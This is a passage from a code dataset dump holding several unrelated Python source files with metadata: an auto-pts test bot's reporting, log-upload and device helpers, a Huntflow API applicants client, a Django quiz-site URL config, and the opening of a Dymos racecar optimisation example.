status_dict[status]\n end_row += 1\n worksheet.write_row(end_row, summary_col, [status, count])\n\n # Total TCS\n row = end_row + 2\n col = summary_col\n total_count = len(results_dict)\n worksheet.write(row, col, \"Total\")\n worksheet.write(row, col + 1, \"{}\".format(total_count))\n worksheet.write(row + 1, col, \"PassRate\", bold)\n if \"PASS\" in status_dict:\n pass_rate = \\\n '{0:.2f}%'.format((status_dict[\"PASS\"] / float(total_count) * 100))\n else:\n pass_rate = '{0:.2f}%'.format(0)\n worksheet.write(row + 1, col + 1, pass_rate, bold)\n\n chart.set_title({'name': 'AutoPTS test results'})\n chart.add_series({\n 'categories': ['Sheet1', summary_row + 1, summary_col,\n end_row, summary_col],\n 'values': ['Sheet1', summary_row + 1, 
summary_col + 1,\n end_row, summary_col + 1],\n })\n\n worksheet.insert_chart('H2', chart)\n workbook.close()\n\n return os.path.join(os.getcwd(), REPORT_XLSX)\n\n\n# ****************************************************************************\n# .txt result file\n# ****************************************************************************\ndef make_report_txt(results_dict, zephyr_hash):\n \"\"\"Creates txt file containing test cases results\n :param results_dict: dictionary with test cases results\n :return: txt file path\n \"\"\"\n\n filename = os.path.join(os.getcwd(), REPORT_TXT)\n f = open(filename, \"w\")\n\n errata = {}\n\n try:\n with open('errata.yaml', 'r') as stream:\n errata = yaml.safe_load(stream)\n except Exception as exc:\n print(exc)\n\n if errata is None:\n errata = {}\n\n f.write(\"%s\\n\" % zephyr_hash)\n for tc, result in list(results_dict.items()):\n if tc in errata:\n result += ' - ERRATA ' + errata[tc]\n\n # The first id in the test case is the test group\n tg = tc.split('/')[0]\n f.write(\"%s%s%s\\n\" % (tg.ljust(8, ' '), tc.ljust(32, ' '), result))\n\n f.close()\n\n return filename\n\n\n# ****************************************************************************\n# Miscellaneous\n# ****************************************************************************\ndef archive_recursive(dir_path):\n \"\"\"Archive directory recursively\n :return: newly created zip file path\n \"\"\"\n zip_file_path = os.path.join(os.path.dirname(dir_path),\n os.path.basename(dir_path) + '.zip')\n with zipfile.ZipFile(zip_file_path, 'w', allowZip64=True) as zf:\n for root, dirs, files in os.walk(dir_path):\n for file_or_dir in files + dirs:\n zf.write(\n os.path.join(root, file_or_dir),\n os.path.relpath(os.path.join(root, file_or_dir),\n os.path.join(dir_path, os.path.pardir)))\n\n return zip_file_path\n\n\ndef archive_testcases(dir_path, depth=3):\n def recursive(directory, depth):\n depth -= 1\n with os.scandir(directory) as it:\n for f in it:\n if f.is_dir():\n if depth > 0:\n recursive(os.path.join(directory, f.name), depth)\n else:\n filepath = os.path.relpath(os.path.join(directory, f.name))\n archive_recursive(filepath)\n shutil.rmtree(filepath)\n\n recursive(dir_path, depth)\n return dir_path\n\n\ndef upload_bpv_logs(gdrive, args):\n \"\"\"Copy Bluetooth Protocol Viewer logs from auto-pts servers.\n :param gdrive: to upload the logs\n :param server_addr: list of server addresses\n :param server_port: list of server ports\n \"\"\"\n excluded = ['SIGDatabase', 'logfiles', '.pqw6', '.xml', '.txt']\n logs_folder = 'tmp/' + args.workspace\n\n shutil.rmtree(logs_folder, ignore_errors=True)\n\n if sys.platform == 'win32':\n workspace_path = get_workspace(args.workspace)\n shutil.copytree(workspace_path, logs_folder)\n archive_testcases(logs_folder, depth=3)\n gdrive.upload_folder(logs_folder, excluded=excluded)\n delete_bpv_logs(workspace_path)\n return\n\n server_addr = args.ip_addr\n server_port = args.srv_port\n\n for i in range(len(server_addr)):\n if i != 0 and server_addr[i] in server_addr[0:i]:\n continue\n\n with ServerProxy(\"http://{}:{}/\".format(server_addr[i], server_port[i]),\n allow_none=True,) as proxy:\n file_list = proxy.list_workspace_tree(args.workspace)\n if len(file_list) == 0:\n continue\n\n workspace_root = file_list.pop()\n while len(file_list) > 0:\n file_path = file_list.pop(0)\n try:\n file_bin = proxy.copy_file(file_path)\n\n if not os.path.splitext(file_path)[1] in ['.pts', '.pqw6']:\n proxy.delete_file(file_path)\n\n if file_bin is None:\n continue\n\n 
file_path = '/'.join([logs_folder,\n file_path[len(workspace_root) + 1:]\n .replace('\\\\', '/')])\n Path(os.path.dirname(file_path)).mkdir(parents=True,\n exist_ok=True)\n\n with open(file_path, 'wb') as handle:\n handle.write(file_bin.data)\n except BaseException as e:\n logging.exception(e)\n\n if os.path.exists(logs_folder):\n archive_testcases(logs_folder, depth=3)\n gdrive.upload_folder(logs_folder, excluded=excluded)\n\n\ndef get_workspace(workspace):\n for root, dirs, files in os.walk(os.path.join(PROJECT_DIR, 'workspaces'),\n topdown=True):\n for name in dirs:\n if name == workspace:\n return os.path.join(root, name)\n return None\n\n\ndef delete_bpv_logs(workspace_path):\n with os.scandir(workspace_path) as it:\n for f in it:\n if f.is_dir():\n shutil.rmtree(f.path, ignore_errors=True)\n\n\ndef update_sources(repo_path, remote, branch, stash_changes=False, update_repo=True):\n \"\"\"GIT Update sources\n :param repo: git repository path\n :param remote: git repository remote name\n :param branch: git repository branch name\n :param stash_changes: stash non-committed changes\n :param update_repo: update repo\n :return: Commit SHA at HEAD\n \"\"\"\n repo = git.Repo(repo_path)\n\n if update_repo:\n print('Updating ' + repo_path)\n\n dirty = repo.is_dirty()\n if dirty and (not stash_changes):\n print('Repo is dirty. Not updating')\n return repo.git.describe('--always'), \\\n repo.git.show('-s', '--format=%H') + '-dirty'\n\n if dirty and stash_changes:\n print('Repo is dirty. Stashing changes')\n repo.git.stash('--include-untracked')\n\n repo.git.fetch(remote)\n repo.git.checkout('{}/{}'.format(remote, branch))\n\n return repo.git.describe('--always'), \\\n repo.git.show('-s', '--format=%H')\n\n\ndef update_repos(project_path, git_config):\n \"\"\"GIT Update sources\n :param project_path: path to project root\n :param git_config: dictionary with configuration of repositories\n :return: repos_dict with {key=repo name, {commit, desc}}\n \"\"\"\n project_path = os.path.abspath(project_path)\n repos_dict = {}\n\n for repo, conf in list(git_config.items()):\n repo_dict = {}\n if not os.path.isabs(conf[\"path\"]):\n repo_path = os.path.join(project_path, conf[\"path\"])\n else:\n repo_path = os.path.abspath(conf[\"path\"])\n\n project_path.join(repo_path)\n\n if 'update_repo' in conf:\n update_repo = conf[\"update_repo\"]\n else:\n update_repo = True\n\n desc, commit = update_sources(repo_path, conf[\"remote\"],\n conf[\"branch\"], conf[\"stash_changes\"],\n update_repo)\n repo_dict[\"commit\"] = commit\n repo_dict[\"desc\"] = desc\n repos_dict[repo] = repo_dict\n\n return repos_dict\n\n\ndef get_free_device(board=None):\n tty = None\n jlink = None\n\n snr_initials_for_debugger = {\n \"nrf52\": '68',\n \"nrf53\": '96'\n }\n\n com_index_for_debugger = {\n \"nrf52\": '00',\n \"nrf53\": '04'\n }\n\n debugger_snrs = subprocess.Popen('nrfjprog -i',\n shell=True,\n stdout=subprocess.PIPE\n ).stdout.read().decode()\n\n debugger_snrs = debugger_snrs.split()\n\n for d_snr in debugger_snrs:\n if d_snr[:2] != snr_initials_for_debugger[board]:\n continue\n\n d_tty = subprocess.Popen('ls -l /dev/serial/by-id' +\n '/usb-SEGGER_J-Link_000' + d_snr +\n '-if' + com_index_for_debugger[board],\n shell=True,\n stdout=subprocess.PIPE\n ).stdout.read().decode()\n reg = \"(?=tty).+$\"\n d_tty = re.findall(reg, d_tty)\n\n if d_snr not in devices_in_use:\n devices_in_use.append(d_snr)\n jlink = d_snr\n tty = '/dev/' + d_tty[0]\n break\n\n if not tty:\n sys.exit('No free device found!')\n\n if 
tty.startswith(\"COM\"):\n tty = \"/dev/ttyS\" + str(int(tty[\"COM\".__len__():]) - 1)\n\n return tty, jlink\n\n\ndef release_device(jlink_srn):\n if jlink_srn:\n devices_in_use.remove(jlink_srn)\n\n\ndef pre_cleanup():\n \"\"\"Perform cleanup before test run\n :return: None\n \"\"\"\n try:\n shutil.copytree(\"logs\", \"oldlogs\", dirs_exist_ok=True)\n shutil.rmtree(\"logs\")\n except OSError:\n pass\n\n\ndef cleanup():\n \"\"\"Perform cleanup\n :return: None\n \"\"\"\n try:\n pass\n except OSError:\n pass\n", "repo_name": "hermabe/auto-pts", "sub_path": "bot/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 20994, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 35, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 119, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 124, "usage_type": "call"}, {"api_name": "mimetypes.guess_type", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 136, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 138, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "smtplib.SMTP", "line_number": 143, "usage_type": "call"}, {"api_name": "oauth2client.file.Storage", "line_number": 161, "usage_type": "call"}, {"api_name": "oauth2client.file", "line_number": 161, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "oauth2client.client.flow_from_clientsecrets", "line_number": 167, "usage_type": "call"}, {"api_name": "oauth2client.client", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "oauth2client.tools.run_flow", "line_number": 169, "usage_type": "call"}, {"api_name": "oauth2client.tools", "line_number": 169, "usage_type": "name"}, {"api_name": "googleapiclient.discovery.build", "line_number": 170, "usage_type": "call"}, {"api_name": "googleapiclient.discovery", "line_number": 170, "usage_type": "name"}, {"api_name": "httplib2.Http", "line_number": 171, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 187, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 187, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 188, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 203, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 203, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 215, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "mimetypes.guess_type", "line_number": 220, "usage_type": "call"}, {"api_name": "googleapiclient.http.MediaFileUpload", "line_number": 227, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 236, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 236, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 238, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 266, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 290, "usage_type": "call"}, {"api_name": "os.path", "line_number": 290, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 290, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 314, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 322, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 322, "usage_type": "attribute"}, {"api_name": "xlsxwriter.Workbook", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 384, "usage_type": "call"}, {"api_name": "os.path", "line_number": 384, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 384, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 396, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 403, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 431, "usage_type": "call"}, {"api_name": "os.path", "line_number": 431, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 431, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path", "line_number": 432, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 433, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 434, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path", "line_number": 437, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path", "line_number": 438, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 439, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 447, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 453, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 453, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 453, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 455, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 470, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 472, "usage_type": "attribute"}, {"api_name": "shutil.copytree", "line_number": 474, "usage_type": "call"}, {"api_name": "xmlrpc.client.ServerProxy", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 499, "usage_type": "call"}, {"api_name": "os.path", "line_number": 499, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.exception", "line_number": 514, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 516, "usage_type": "call"}, {"api_name": "os.path", "line_number": 516, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 526, "usage_type": "call"}, {"api_name": "os.path", "line_number": 526, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 531, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 534, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 574, "usage_type": "call"}, {"api_name": "os.path", "line_number": 574, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 579, "usage_type": "call"}, {"api_name": "os.path", "line_number": 579, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 615, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 617, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 626, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 630, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 633, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 642, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 660, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 661, "usage_type": "call"}]}
+{"seq_id": "9837962734", "text": "from typing import Any, Dict, List, Optional, Union\n\nfrom huntflow_api_client.entities.base import (\n BaseEntity,\n CreateEntityMixin,\n GetEntityMixin,\n ListEntityMixin,\n)\nfrom huntflow_api_client.models.consts import AgreementState, ApplicantSearchField\nfrom huntflow_api_client.models.request.applicants import (\n ApplicantCreateRequest,\n ApplicantUpdateRequest,\n)\nfrom huntflow_api_client.models.response.applicants import (\n ApplicantCreateResponse,\n ApplicantItem,\n ApplicantListResponse,\n ApplicantSearchByCursorResponse,\n)\n\n\nclass Applicant(BaseEntity, ListEntityMixin, CreateEntityMixin, GetEntityMixin):\n async def list(\n self,\n account_id: int,\n count: Optional[int] = 30,\n page: Optional[int] = 1,\n status: Optional[int] = None,\n vacancy_id: Optional[int] = None,\n agreement_state: Optional[AgreementState] = None,\n ) -> ApplicantListResponse:\n \"\"\"\n API method reference https://api.huntflow.ai/v2/docs#get-/accounts/-account_id-/applicants\n\n :param account_id: Organization ID\n :param count: Number of items per page\n :param page: Page number\n :param status: Vacancy status ID\n :param vacancy_id: Vacancy ID\n :param agreement_state: Agreement's state of applicant to personal data processing.\n Available if the Personal Data module is enabled for organization.\n Cannot be supplied if the status parameter is passed.\n :return: List of applicants with pagination\n \"\"\"\n params: Dict[str, Any] = {\"count\": count, \"page\": page}\n if status:\n params[\"status\"] = status\n if vacancy_id:\n params[\"vacancy_id\"] = vacancy_id\n if agreement_state:\n params[\"agreement_state\"] = agreement_state.value\n response = await self._api.request(\n \"GET\",\n f\"/accounts/{account_id}/applicants\",\n params=params,\n )\n return ApplicantListResponse.model_validate(response.json())\n\n async def create(\n self,\n account_id: int,\n data: ApplicantCreateRequest,\n ) -> ApplicantCreateResponse:\n \"\"\"\n API method reference https://api.huntflow.ai/v2/docs#post-/accounts/-account_id-/applicants\n\n :param account_id: Organization ID\n :param data: Applicant data\n :return: The created applicant\n \"\"\"\n response = await self._api.request(\n \"POST\",\n f\"/accounts/{account_id}/applicants\",\n json=data.jsonable_dict(exclude_none=True),\n )\n return ApplicantCreateResponse.model_validate(response.json())\n\n async def get(self, account_id: int, applicant_id: int) -> ApplicantItem:\n \"\"\"\n API method reference\n https://api.huntflow.ai/v2/docs#get-/accounts/-account_id-/applicants/-applicant_id-\n\n :param account_id: Organization ID\n :param applicant_id: Applicant ID\n :return: The specified applicant\n \"\"\"\n response = await self._api.request(\n \"GET\",\n f\"/accounts/{account_id}/applicants/{applicant_id}\",\n )\n return ApplicantItem.model_validate(response.json())\n\n async def patch(\n self,\n account_id: int,\n applicant_id: int,\n data: ApplicantUpdateRequest,\n ) -> ApplicantItem:\n \"\"\"\n API method reference\n https://api.huntflow.ai/v2/docs#patch-/accounts/-account_id-/applicants/-applicant_id-\n\n :param account_id: Organization ID\n :param applicant_id: Applicant ID\n :param data: Applicant data\n :return: The created applicant\n \"\"\"\n response = await self._api.request(\n \"PATCH\",\n f\"/accounts/{account_id}/applicants/{applicant_id}\",\n json=data.jsonable_dict(exclude_none=True),\n )\n return ApplicantItem.model_validate(response.json())\n\n async def delete(self, account_id: int, applicant_id: int) 
-> None:\n \"\"\"\n API method reference\n https://api.huntflow.ai/v2/docs#delete-/accounts/-account_id-/applicants/-applicant_id-\n\n :param account_id: Organization ID\n :param applicant_id: Applicant ID\n \"\"\"\n await self._api.request(\n \"DELETE\",\n f\"/accounts/{account_id}/applicants\" f\"/{applicant_id}\",\n )\n\n async def search_by_cursor(\n self,\n account_id: int,\n next_page_cursor: Optional[str] = None,\n query: Optional[str] = None,\n tag: Optional[List[int]] = None,\n status: Optional[List[int]] = None,\n rejection_reason: Optional[List[int]] = None,\n vacancy: Union[List[int], None] = None,\n only_current_status: bool = False,\n account_source: Optional[List[int]] = None,\n field: ApplicantSearchField = ApplicantSearchField.all,\n count: int = 30,\n ) -> ApplicantSearchByCursorResponse:\n \"\"\"\n API method reference:\n https://api.huntflow.ai/v2/docs#get-/accounts/-account_id-/applicants/search_by_cursor\n\n :param account_id: Organization ID\n :param next_page_cursor: A cursor to the next page,\n if specified, no other params will be included\n :param query: Search query\n :param tag: List of tag ID\n :param status: List of vacancy status ID\n :param rejection_reason: List of rejection reason ID\n :param vacancy: List of vacancy ID's or None\n - None - no filter for vacancies\n - [] - empty list means applicant is not assigned to any vacancy\n - [1, 2, 3] - applicants assigned to specified vacancies\n :param only_current_status: If the value is set to True,\n then applicants who are currently at this status will be displayed.\n :param account_source: List of resume source ID\n :param field: Search field\n :param count: Number of items per page\n\n :return: Returns a list of found applicants and a cursor to the next page\n \"\"\"\n\n path = f\"/accounts/{account_id}/applicants/search_by_cursor\"\n\n params: Dict[str, Any]\n if next_page_cursor is not None:\n params = {\"next_page_cursor\": next_page_cursor}\n else:\n params = {\n \"tag\": tag or [],\n \"status\": status or [],\n \"rejection_reason\": rejection_reason or [],\n \"only_current_status\": only_current_status,\n \"field\": field.value,\n \"count\": count,\n \"account_source\": account_source or [],\n }\n if query:\n params[\"q\"] = query\n\n if vacancy is not None:\n params[\"vacancy\"] = vacancy if vacancy else \"null\"\n\n response = await self._api.request(\"GET\", path, params=params)\n return ApplicantSearchByCursorResponse.model_validate(response.json())\n", "repo_name": "huntflow/huntflow-api-client-python", "sub_path": "huntflow_api_client/entities/applicants.py", "file_name": "applicants.py", "file_ext": "py", "file_size_in_byte": 6966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "huntflow_api_client.entities.base.BaseEntity", "line_number": 22, "usage_type": "name"}, {"api_name": "huntflow_api_client.entities.base.ListEntityMixin", "line_number": 22, "usage_type": "name"}, {"api_name": "huntflow_api_client.entities.base.CreateEntityMixin", "line_number": 22, "usage_type": "name"}, {"api_name": "huntflow_api_client.entities.base.GetEntityMixin", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Optional", 
"line_number": 30, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.consts.AgreementState", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 45, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantListResponse.model_validate", "line_number": 57, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantListResponse", "line_number": 57, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantListResponse", "line_number": 31, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.request.applicants.ApplicantCreateRequest", "line_number": 62, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantCreateResponse.model_validate", "line_number": 76, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantCreateResponse", "line_number": 76, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantCreateResponse", "line_number": 63, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem.model_validate", "line_number": 91, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 91, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 78, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.request.applicants.ApplicantUpdateRequest", "line_number": 97, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem.model_validate", "line_number": 113, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 113, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 138, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.consts.ApplicantSearchField", "line_number": 139, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.consts.ApplicantSearchField.all", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 168, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 168, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantSearchByCursorResponse.model_validate", "line_number": 188, "usage_type": "call"}, {"api_name": 
"huntflow_api_client.models.response.applicants.ApplicantSearchByCursorResponse", "line_number": 188, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantSearchByCursorResponse", "line_number": 141, "usage_type": "name"}]}
+{"seq_id": "5253393129", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('take-quiz', views.take_quiz, name='take-quiz'),\n path('signin', views.signin, name='signin'),\n path('quiz-list', views.quiz_list, name='quiz-list'),\n path('my-profile', views.my_account, name='learner-profile'),\n path('countdown', views.countdown, name='countdown'),\n path('signup', views.signup, name='learner-signup'),\n path('all-quiz', views.all_quiz, name='all-quiz'),\n path('quiz-result', views.result_page, name='quiz-result'),\n path('quiz-review', views.review_page, name='quiz-review'),\n path('generate', views.generate, name='generate-l'),\n path('', views.home_page, name='l-home'),\n path('practice-quiz', views.practice_quiz, name='practice-quiz'),\n path('logout', views.logout_l, name='l-logout'),\n path('live-list', views.live_list, name='live-list'),\n path('instructor-list', views.instructor_list, name='instructor-list'),\n path('instructor-profile', views.instructor_profile, name='instructor-profile')\n]\n", "repo_name": "Subodh7300/Quiz-Emporium", "sub_path": "quizsite/student/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "38506799219", "text": "import numpy as np\nimport openmdao.api as om\nimport dymos as dm\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nfrom dymos.examples.racecar.combinedODE import CombinedODE\nfrom dymos.examples.racecar.spline import get_spline, get_track_points\nfrom dymos.examples.racecar.tracks import ovaltrack\n\nfrom paropt.paropt_sparse_driver import ParOptSparseDriver\n\n# change track here and in curvature.py. Tracks are defined in tracks.py\ntrack = ovaltrack\n\n# generate nodes along the centerline for curvature calculation (different\n# than collocation nodes)\npoints = get_track_points(track)\n\n# fit the centerline spline.\nfinespline, gates, gatesd, curv, slope = get_spline(points, s=0.0)\n\n# by default 10000 points\ns_final = track.get_total_length()\n\n# Define the OpenMDAO problem\np = om.Problem(model=om.Group())\n\n# Define a Trajectory object\ntraj = dm.Trajectory()\np.model.add_subsystem(\"traj\", subsys=traj)\n\n# Define a Dymos Phase object with GaussLobatto Transcription\nphase = dm.Phase(\n ode_class=CombinedODE,\n transcription=dm.GaussLobatto(num_segments=80, order=3, compressed=True),\n)\n\ntraj.add_phase(name=\"phase0\", phase=phase)\n\n# Set the time options, in this problem we perform a change of variables. So 'time' is\n# actually 's' (distance along the track centerline)\n# This is done to fix the collocation nodes in space, which saves us the calculation of\n# the rate of change of curvature.\n# The state equations are written with respect to time, the variable change occurs in\n# timeODE.py\nphase.set_time_options(\n fix_initial=True,\n fix_duration=True,\n duration_val=s_final,\n name=\"s\",\n targets=[\"curv.s\"],\n units=\"m\",\n duration_ref=s_final,\n duration_ref0=10,\n)\n\n# Set the reference values\nt_ref = 100.0\nn_ref = 4.0\nV_ref = 40.0\nlambda_ref = 0.01\nalpha_ref = 0.15\nomega_ref = 0.3\nax_ref = 